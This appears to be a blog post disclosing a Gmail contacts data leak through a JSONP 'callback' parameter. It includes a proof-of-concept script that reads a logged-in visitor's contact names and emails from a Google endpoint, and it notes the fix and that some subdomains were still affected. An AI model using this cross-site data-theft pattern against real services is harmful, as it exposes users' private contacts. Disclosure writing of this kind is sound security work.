Serious Gmail vulnerability fixed

After posting my last article about the contacts "JSON API", Haochi Chen discovered that by simply appending a "callback" variable in the URL, the creators of a malicious site could gain access to a visitors entire Gmail contact list without warning.<script language="javascript">     function getContacts(response){       var output = "";       for(x=0;x<response.

After posting my last article about the contacts "JSON API", Haochi Chen discovered that by simply appending a "callback" variable in the URL, the creators of a malicious site could gain access to a visitors entire Gmail contact list without warning.

<script language="javascript">
     function getContacts(response){
       var output = "";
       for(x=0;x<response.Body.Contacts.length;x++){
         output += response.Body.Contacts[x].Name + " <" + response.Body.Contacts[x].Email + "> ";
       }
       alert(output);
     }
</script>

<script language="javascript" xsrc="http://video.google.com/data/contacts?out=js&max=500 &psort=Affinity&callback=getContacts">
</script>

This sample script once proudly displayed the visitors contact list if they were logged into their Google account.  Only hours after it was reported to the Google security team, the vulnerability was fixed.

"Thanks for reporting this to us.  We have identified and fixed the problem" -- Google Security

It's a little concerning that this problem even existed, but knowing the fix was made only hours after it was reported does warrant some level of reassurance.

Update:
The problem is only partially fixed.  The vulnerability exposed through video.google.com has been patched up, but there are other subdomains where the problem still exists.